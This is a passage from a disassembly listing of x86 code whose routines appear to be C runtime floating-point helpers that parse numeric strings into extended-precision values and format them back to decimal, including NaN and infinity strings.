jmp short loc_41F88B
sub_41F80A endp
; =============== S U B R O U T I N E =======================================
sub_41F893 proc near ; CODE XREF: sub_41DD85+2B�p
; sub_41DD85+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_41F8A9
cmp ecx, esi
jnb short loc_41F8AC
loc_41F8A9: ; CODE XREF: sub_41F893+10�j
push 1
pop eax
loc_41F8AC: ; CODE XREF: sub_41F893+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_41F893 endp
; =============== S U B R O U T I N E =======================================
sub_41F8B4 proc near ; CODE XREF: sub_41F96D+40�p
; sub_41F96D+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_41F893
add esp, 0Ch
test eax, eax
jz short loc_41F8E6
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_41F893
add esp, 0Ch
test eax, eax
jz short loc_41F8E6
inc dword ptr [esi+8]
loc_41F8E6: ; CODE XREF: sub_41F8B4+19�j
; sub_41F8B4+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_41F893
add esp, 0Ch
test eax, eax
jz short loc_41F8FE
inc dword ptr [esi+8]
loc_41F8FE: ; CODE XREF: sub_41F8B4+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_41F893
add esp, 0Ch
pop edi
pop esi
retn
sub_41F8B4 endp
; =============== S U B R O U T I N E =======================================
sub_41F912 proc near ; CODE XREF: sub_41F96D+30�p
; sub_41F96D+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_41F912 endp
; =============== S U B R O U T I N E =======================================
sub_41F940 proc near ; CODE XREF: sub_41FF41+1C8�p
; sub_420722+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_41F940 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F96D proc near ; CODE XREF: sub_41FA34+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_41F9E1
push edi
mov [ebp+arg_8], eax
loc_41F994: ; CODE XREF: sub_41F96D+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_41F912
push ebx
call sub_41F912
lea eax, [ebp+var_10]
push eax
push ebx
call sub_41F8B4
push ebx
call sub_41F912
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_41F8B4
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_41F994
xor edx, edx
pop edi
loc_41F9E1: ; CODE XREF: sub_41F96D+21�j
; sub_41F96D+9F�j
cmp [ebx+8], edx
jnz short loc_41FA0E
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_41F9E1
; ---------------------------------------------------------------------------
loc_41FA0E: ; CODE XREF: sub_41F96D+77�j
mov esi, 8000h
loc_41FA13: ; CODE XREF: sub_41F96D+B9�j
test [ebx+8], esi
jnz short loc_41FA28
push ebx
call sub_41F912
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_41FA13
; ---------------------------------------------------------------------------
loc_41FA28: ; CODE XREF: sub_41F96D+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_41F96D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FA34 proc near ; CODE XREF: sub_41E148+17�p
; .text:0041E18D�p ...
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_41FA6F: ; CODE XREF: sub_41FA34+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_41FA85
cmp cl, 9
jz short loc_41FA85
cmp cl, 0Ah
jz short loc_41FA85
cmp cl, 0Dh
jnz short loc_41FA88
loc_41FA85: ; CODE XREF: sub_41FA34+40�j
; sub_41FA34+45�j ...
inc edi
jmp short loc_41FA6F
; ---------------------------------------------------------------------------
loc_41FA88: ; CODE XREF: sub_41FA34+4F�j
push 4
pop esi
loc_41FA8B: ; CODE XREF: sub_41FA34+AE�j
; sub_41FA34+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_41FD0E ; default
; jumptable 0041FA97 case 10
jmp ds:off_41FED5[eax*4] ; switch jump
loc_41FA9E: ; DATA XREF: .text:off_41FED5�o
cmp bl, 31h ; jumptable 0041FA97 case 0
jl short loc_41FAAF
cmp bl, 39h
jg short loc_41FAAF
loc_41FAA8: ; CODE XREF: sub_41FA34+C4�j
; sub_41FA34+118�j
push 3
jmp loc_41FCCC
; ---------------------------------------------------------------------------
loc_41FAAF: ; CODE XREF: sub_41FA34+6D�j
; sub_41FA34+72�j
cmp bl, byte_435E3C
jnz short loc_41FABE
loc_41FAB7: ; CODE XREF: sub_41FA34+124�j
push 5
jmp loc_41FD04
; ---------------------------------------------------------------------------
loc_41FABE: ; CODE XREF: sub_41FA34+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41FAE4
dec eax
dec eax
jz short loc_41FAD8
sub eax, 3
jnz loc_41FDA7
jmp loc_41FB67
; ---------------------------------------------------------------------------
loc_41FAD8: ; CODE XREF: sub_41FA34+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_41FA8B
; ---------------------------------------------------------------------------
loc_41FAE4: ; CODE XREF: sub_41FA34+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_41FA8B
; ---------------------------------------------------------------------------
loc_41FAED: ; CODE XREF: sub_41FA34+63�j
; DATA XREF: .text:off_41FED5�o
cmp bl, 31h ; jumptable 0041FA97 case 1
mov [ebp+var_10], edx
jl short loc_41FAFA
cmp bl, 39h
jle short loc_41FAA8
loc_41FAFA: ; CODE XREF: sub_41FA34+BF�j
cmp bl, byte_435E3C
jz loc_41FBC2
cmp bl, 2Bh
jz short loc_41FB3C
cmp bl, 2Dh
jz short loc_41FB3C
cmp bl, 30h
jz short loc_41FB67
loc_41FB15: ; CODE XREF: sub_41FA34+207�j
cmp bl, 43h
jle loc_41FDA7
cmp bl, 45h
jle short loc_41FB35
cmp bl, 63h
jle loc_41FDA7
cmp bl, 65h
jg loc_41FDA7
loc_41FB35: ; CODE XREF: sub_41FA34+ED�j
push 6
jmp loc_41FD04
; ---------------------------------------------------------------------------
loc_41FB3C: ; CODE XREF: sub_41FA34+D5�j
; sub_41FA34+DA�j ...
dec edi
push 0Bh
jmp loc_41FD04
; ---------------------------------------------------------------------------
loc_41FB44: ; CODE XREF: sub_41FA34+63�j
; DATA XREF: .text:off_41FED5�o
cmp bl, 31h ; jumptable 0041FA97 case 2
jl short loc_41FB52
cmp bl, 39h
jle loc_41FAA8
loc_41FB52: ; CODE XREF: sub_41FA34+113�j
cmp bl, byte_435E3C
jz loc_41FAB7
cmp bl, 30h
jnz loc_41FD1C
loc_41FB67: ; CODE XREF: sub_41FA34+9F�j
; sub_41FA34+DF�j
mov eax, edx
jmp loc_41FA8B
; ---------------------------------------------------------------------------
loc_41FB6E: ; CODE XREF: sub_41FA34+63�j
; DATA XREF: .text:off_41FED5�o
mov [ebp+var_10], edx ; jumptable 0041FA97 case 3
loc_41FB71: ; CODE XREF: sub_41FA34+184�j
cmp dword_435E38, edx
jle short loc_41FB8A
movzx eax, bl
push esi
push eax
call sub_41BDD1
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41FB98
; ---------------------------------------------------------------------------
loc_41FB8A: ; CODE XREF: sub_41FA34+143�j
mov ecx, off_435C2C
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41FB98: ; CODE XREF: sub_41FA34+154�j
test eax, eax
jz short loc_41FBBA
cmp [ebp+var_4], 19h
jnb short loc_41FBB2
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_41FBB5
; ---------------------------------------------------------------------------
loc_41FBB2: ; CODE XREF: sub_41FA34+16C�j
inc [ebp+var_8]
loc_41FBB5: ; CODE XREF: sub_41FA34+17C�j
mov bl, [edi]
inc edi
jmp short loc_41FB71
; ---------------------------------------------------------------------------
loc_41FBBA: ; CODE XREF: sub_41FA34+166�j
cmp bl, byte_435E3C
jnz short loc_41FC29
loc_41FBC2: ; CODE XREF: sub_41FA34+CC�j
mov eax, esi
jmp loc_41FA8B
; ---------------------------------------------------------------------------
loc_41FBC9: ; CODE XREF: sub_41FA34+63�j
; DATA XREF: .text:off_41FED5�o
cmp [ebp+var_4], 0 ; jumptable 0041FA97 case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_41FBE2
loc_41FBD5: ; CODE XREF: sub_41FA34+1AC�j
cmp bl, 30h
jnz short loc_41FBE2
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_41FBD5
; ---------------------------------------------------------------------------
loc_41FBE2: ; CODE XREF: sub_41FA34+19F�j
; sub_41FA34+1A4�j ...
cmp dword_435E38, edx
jle short loc_41FBFB
movzx eax, bl
push esi
push eax
call sub_41BDD1
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41FC09
; ---------------------------------------------------------------------------
loc_41FBFB: ; CODE XREF: sub_41FA34+1B4�j
mov ecx, off_435C2C
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41FC09: ; CODE XREF: sub_41FA34+1C5�j
test eax, eax
jz short loc_41FC29
cmp [ebp+var_4], 19h
jnb short loc_41FC24
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_41FC24: ; CODE XREF: sub_41FA34+1DD�j
mov bl, [edi]
inc edi
jmp short loc_41FBE2
; ---------------------------------------------------------------------------
loc_41FC29: ; CODE XREF: sub_41FA34+18C�j
; sub_41FA34+1D7�j
cmp bl, 2Bh
jz loc_41FB3C
cmp bl, 2Dh
jz loc_41FB3C
jmp loc_41FB15
; ---------------------------------------------------------------------------
loc_41FC40: ; CODE XREF: sub_41FA34+63�j
; DATA XREF: .text:off_41FED5�o
cmp dword_435E38, edx ; jumptable 0041FA97 case 5
mov [ebp+var_24], edx
jle short loc_41FC5C
movzx eax, bl
push esi
push eax
call sub_41BDD1
pop ecx
pop ecx
push 1
pop edx
jmp short loc_41FC6A
; ---------------------------------------------------------------------------
loc_41FC5C: ; CODE XREF: sub_41FA34+215�j
mov ecx, off_435C2C
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_41FC6A: ; CODE XREF: sub_41FA34+226�j
test eax, eax
jz loc_41FD1C
mov eax, esi
jmp short loc_41FCCD
; ---------------------------------------------------------------------------
loc_41FC76: ; CODE XREF: sub_41FA34+63�j
; DATA XREF: .text:off_41FED5�o
lea ecx, [edi-2] ; jumptable 0041FA97 case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_41FC86
cmp bl, 39h
jle short loc_41FCCA
loc_41FC86: ; CODE XREF: sub_41FA34+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41FD02
dec eax
dec eax
jz short loc_41FCF6
sub eax, 3
jnz loc_41FDAA
loc_41FC9B: ; CODE XREF: sub_41FA34+2A4�j
push 8
jmp short loc_41FD04
; ---------------------------------------------------------------------------
loc_41FC9F: ; CODE XREF: sub_41FA34+63�j
; DATA XREF: .text:off_41FED5�o
mov [ebp+var_20], edx ; jumptable 0041FA97 case 8
loc_41FCA2: ; CODE XREF: sub_41FA34+276�j
cmp bl, 30h
jnz short loc_41FCAC
mov bl, [edi]
inc edi
jmp short loc_41FCA2
; ---------------------------------------------------------------------------
loc_41FCAC: ; CODE XREF: sub_41FA34+271�j
cmp bl, 31h
jl loc_41FDA7
cmp bl, 39h
jg loc_41FDA7
jmp short loc_41FCCA
; ---------------------------------------------------------------------------
loc_41FCC0: ; CODE XREF: sub_41FA34+63�j
; DATA XREF: .text:off_41FED5�o
cmp bl, 31h ; jumptable 0041FA97 case 7
jl short loc_41FCD3
cmp bl, 39h
jg short loc_41FCD3
loc_41FCCA: ; CODE XREF: sub_41FA34+250�j
; sub_41FA34+28A�j
push 9
loc_41FCCC: ; CODE XREF: sub_41FA34+76�j
pop eax
loc_41FCCD: ; CODE XREF: sub_41FA34+240�j
dec edi
jmp loc_41FA8B
; ---------------------------------------------------------------------------
loc_41FCD3: ; CODE XREF: sub_41FA34+28F�j
; sub_41FA34+294�j
cmp bl, 30h
jnz short loc_41FD1C
jmp short loc_41FC9B
; ---------------------------------------------------------------------------
loc_41FCDA: ; CODE XREF: sub_41FA34+63�j
; DATA XREF: .text:off_41FED5�o
cmp [ebp+arg_18], 0 ; jumptable 0041FA97 case 11
jz short loc_41FD0A
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_41FD02
dec eax
dec eax
jnz loc_41FDAA
loc_41FCF6: ; CODE XREF: sub_41FA34+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_41FA8B
; ---------------------------------------------------------------------------
loc_41FD02: ; CODE XREF: sub_41FA34+258�j
; sub_41FA34+2B8�j
push 7
loc_41FD04: ; CODE XREF: sub_41FA34+85�j
; sub_41FA34+103�j ...
pop eax
jmp loc_41FA8B
; ---------------------------------------------------------------------------
loc_41FD0A: ; CODE XREF: sub_41FA34+2AA�j
push 0Ah
dec edi
pop eax
loc_41FD0E: ; CODE XREF: sub_41FA34+5D�j
; sub_41FA34+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 0041FA97 case 10
jz loc_41FDAC
jmp loc_41FA8B
; ---------------------------------------------------------------------------
loc_41FD1C: ; CODE XREF: sub_41FA34+12D�j
; sub_41FA34+238�j ...
mov edi, [ebp+arg_8]
jmp loc_41FDAC
; ---------------------------------------------------------------------------
loc_41FD24: ; CODE XREF: sub_41FA34+63�j
; DATA XREF: .text:off_41FED5�o
mov [ebp+var_20], 1 ; jumptable 0041FA97 case 9
xor esi, esi
loc_41FD2D: ; CODE XREF: sub_41FA34+339�j
cmp dword_435E38, 1
jle short loc_41FD45
movzx eax, bl
push 4
push eax
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41FD54
; ---------------------------------------------------------------------------
loc_41FD45: ; CODE XREF: sub_41FA34+300�j
mov ecx, off_435C2C
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41FD54: ; CODE XREF: sub_41FA34+30F�j
test eax, eax
jz short loc_41FD74
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_41FD6F
mov bl, [edi]
inc edi
jmp short loc_41FD2D
; ---------------------------------------------------------------------------
loc_41FD6F: ; CODE XREF: sub_41FA34+334�j
mov esi, 1451h
loc_41FD74: ; CODE XREF: sub_41FA34+322�j
mov [ebp+var_1C], esi
loc_41FD77: ; CODE XREF: sub_41FA34+371�j
cmp dword_435E38, 1
jle short loc_41FD8F
movzx eax, bl
push 4
push eax
call sub_41BDD1
pop ecx
pop ecx
jmp short loc_41FD9E
; ---------------------------------------------------------------------------
loc_41FD8F: ; CODE XREF: sub_41FA34+34A�j
mov ecx, off_435C2C
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_41FD9E: ; CODE XREF: sub_41FA34+359�j
test eax, eax
jz short loc_41FDA7
mov bl, [edi]
inc edi
jmp short loc_41FD77
; ---------------------------------------------------------------------------
loc_41FDA7: ; CODE XREF: sub_41FA34+99�j
; sub_41FA34+E4�j ...
dec edi
jmp short loc_41FDAC
; ---------------------------------------------------------------------------
loc_41FDAA: ; CODE XREF: sub_41FA34+261�j
; sub_41FA34+2BC�j
mov edi, ecx
loc_41FDAC: ; CODE XREF: sub_41FA34+2DD�j
; sub_41FA34+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_41FE94
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_41FDD8
cmp [ebp+var_45], 5
jl short loc_41FDCC
inc [ebp+var_45]
loc_41FDCC: ; CODE XREF: sub_41FA34+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_41FDDB
; ---------------------------------------------------------------------------
loc_41FDD8: ; CODE XREF: sub_41FA34+38D�j
mov eax, [ebp+var_C]
loc_41FDDB: ; CODE XREF: sub_41FA34+3A2�j
cmp [ebp+var_4], 0
jbe loc_41FE8A
loc_41FDE5: ; CODE XREF: sub_41FA34+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_41FDF3
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_41FDE5
; ---------------------------------------------------------------------------
loc_41FDF3: ; CODE XREF: sub_41FA34+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_41F96D
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_41FE12
neg eax
loc_41FE12: ; CODE XREF: sub_41FA34+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_41FE1D
add eax, [ebp+arg_10]
loc_41FE1D: ; CODE XREF: sub_41FA34+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_41FE25
sub eax, [ebp+arg_14]
loc_41FE25: ; CODE XREF: sub_41FA34+3EC�j
cmp eax, 1450h
jle short loc_41FE5C
mov [ebp+var_2C], 1
loc_41FE33: ; CODE XREF: sub_41FA34+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_41FE3F: ; CODE XREF: sub_41FA34+454�j
; sub_41FA34+45E�j
cmp [ebp+var_2C], 0
jz short loc_41FEA5
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_41FEBA
; ---------------------------------------------------------------------------
loc_41FE5C: ; CODE XREF: sub_41FA34+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_41FE6C
mov [ebp+var_30], 1
jmp short loc_41FE33
; ---------------------------------------------------------------------------
loc_41FE6C: ; CODE XREF: sub_41FA34+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_420942
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_41FE3F
; ---------------------------------------------------------------------------
loc_41FE8A: ; CODE XREF: sub_41FA34+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_41FE3F
; ---------------------------------------------------------------------------
loc_41FE94: ; CODE XREF: sub_41FA34+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_41FEBA
; ---------------------------------------------------------------------------
loc_41FEA5: ; CODE XREF: sub_41FA34+40F�j
cmp [ebp+var_30], 0
jz short loc_41FEBA
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_41FEBA: ; CODE XREF: sub_41FA34+426�j
; sub_41FA34+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_41FA34 endp
; ---------------------------------------------------------------------------
off_41FED5 dd offset loc_41FA9E ; DATA XREF: sub_41FA34+63�r
dd offset loc_41FAED ; jump table for switch statement
dd offset loc_41FB44
dd offset loc_41FB6E
dd offset loc_41FBC9
dd offset loc_41FC40
dd offset loc_41FC76
dd offset loc_41FCC0
dd offset loc_41FC9F
dd offset loc_41FD24
dd offset loc_41FD0E
dd offset loc_41FCDA
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push esi
push eax
push eax
push eax
lea eax, [ebp-0Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push eax
call sub_41FA34
push dword ptr [ebp+8]
mov esi, eax
lea eax, [ebp-0Ch]
push eax
call sub_41E0CE
add esp, 24h
cmp eax, 1
jnz short loc_41FF3C
or esi, 2
loc_41FF3C: ; CODE XREF: .text:0041FF37�j
mov eax, esi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FF41 proc near ; CODE XREF: sub_41E247+2C�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_41FFA3
mov byte ptr [ebx+2], 2Dh
jmp short loc_41FFA7
; ---------------------------------------------------------------------------
loc_41FFA3: ; CODE XREF: sub_41FF41+5A�j
mov byte ptr [ebx+2], 20h
loc_41FFA7: ; CODE XREF: sub_41FF41+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_41FFCD
test edi, edi
jnz short loc_41FFCD
cmp [ebp+arg_0], edi
jnz short loc_41FFCD
loc_41FFB8: ; CODE XREF: sub_41FF41+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_4201CB
; ---------------------------------------------------------------------------
loc_41FFCD: ; CODE XREF: sub_41FF41+6C�j
; sub_41FF41+70�j ...
cmp dx, si
jnz short loc_42004C
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_41FFE6
cmp [ebp+arg_0], 0
jz short loc_41FFF5
loc_41FFE6: ; CODE XREF: sub_41FF41+9D�j
test edi, 40000000h
jnz short loc_41FFF5
push offset a1Snan ; "1#SNAN"
jmp short loc_42003B
; ---------------------------------------------------------------------------
loc_41FFF5: ; CODE XREF: sub_41FF41+A3�j
; sub_41FF41+AB�j
test cx, cx
jz short loc_42000F
cmp edi, 0C0000000h
jnz short loc_42000F
cmp [ebp+arg_0], 0
jnz short loc_420036
push offset a1Ind ; "1#IND"
jmp short loc_42001E
; ---------------------------------------------------------------------------
loc_42000F: ; CODE XREF: sub_41FF41+B7�j
; sub_41FF41+BF�j
cmp edi, eax
jnz short loc_420036
cmp [ebp+arg_0], 0
jnz short loc_420036
push offset a1Inf ; "1#INF"
loc_42001E: ; CODE XREF: sub_41FF41+CC�j
lea eax, [ebx+4]
push eax
call sub_4175D0
pop ecx
mov byte ptr [ebx+3], 5
pop ecx
loc_42002D: ; CODE XREF: sub_41FF41+109�j
and [ebp+var_4], 0
jmp loc_4201A4
; ---------------------------------------------------------------------------
loc_420036: ; CODE XREF: sub_41FF41+C5�j
; sub_41FF41+D0�j ...
push offset a1Qnan ; "1#QNAN"
loc_42003B: ; CODE XREF: sub_41FF41+B2�j
lea eax, [ebx+4]
push eax
call sub_4175D0
pop ecx
mov byte ptr [ebx+3], 6
pop ecx
jmp short loc_42002D
; ---------------------------------------------------------------------------
loc_42004C: ; CODE XREF: sub_41FF41+8F�j
movzx eax, dx
mov ecx, edi
mov esi, eax
shr ecx, 18h
imul eax, 4D10h
shr esi, 8
and [ebp+var_10], 0
push 1
lea ecx, [esi+ecx*2]
mov [ebp+var_6], dx
imul ecx, 4Dh
mov [ebp+var_A], edi
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
sar esi, 10h
mov [ebp+var_E], eax
movsx eax, si
neg eax
push eax
lea eax, [ebp+var_10]
push eax
call sub_420942
add esp, 0Ch
cmp [ebp+var_6], 3FFFh
jb short loc_4200AD
lea eax, [ebp+var_1C]
inc esi
push eax
lea eax, [ebp+var_10]
push eax
call sub_420722
pop ecx
pop ecx
loc_4200AD: ; CODE XREF: sub_41FF41+15A�j
test [ebp+arg_10], 1
mov [ebx], si
jz short loc_4200C7
mov edi, [ebp+arg_C]
movsx eax, si
add edi, eax
test edi, edi
jg short loc_4200CA
jmp loc_41FFB8
; ---------------------------------------------------------------------------
loc_4200C7: ; CODE XREF: sub_41FF41+173�j
mov edi, [ebp+arg_C]
loc_4200CA: ; CODE XREF: sub_41FF41+17F�j
cmp edi, 15h
jle short loc_4200D2
push 15h
pop edi
loc_4200D2: ; CODE XREF: sub_41FF41+18C�j
movzx esi, [ebp+var_6]
sub esi, 3FFEh
and [ebp+var_6], 0
mov [ebp+arg_14], 8
loc_4200E8: ; CODE XREF: sub_41FF41+1B4�j
lea eax, [ebp+var_10]
push eax
call sub_41F912
dec [ebp+arg_14]
pop ecx
jnz short loc_4200E8
test esi, esi
jge short loc_420112
neg esi
and esi, 0FFh
jle short loc_420112
loc_420105: ; CODE XREF: sub_41FF41+1CF�j
lea eax, [ebp+var_10]
push eax
call sub_41F940
dec esi
pop ecx
jnz short loc_420105
loc_420112: ; CODE XREF: sub_41FF41+1B8�j
; sub_41FF41+1C2�j
lea ecx, [edi+1]
lea eax, [ebx+4]
test ecx, ecx
mov [ebp+arg_14], eax
jle short loc_42016F
mov [ebp+arg_C], ecx
loc_420122: ; CODE XREF: sub_41FF41+229�j
lea esi, [ebp+var_10]
lea edi, [ebp+arg_0]
movsd
movsd
lea eax, [ebp+var_10]
push eax
movsd
call sub_41F912
lea eax, [ebp+var_10]
push eax
call sub_41F912
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41F8B4
lea eax, [ebp+var_10]
push eax
call sub_41F912
mov al, byte ptr [ebp+var_6+1]
mov ecx, [ebp+arg_14]
and byte ptr [ebp+var_6+1], 0
add esp, 14h
add al, 30h
inc [ebp+arg_14]
dec [ebp+arg_C]
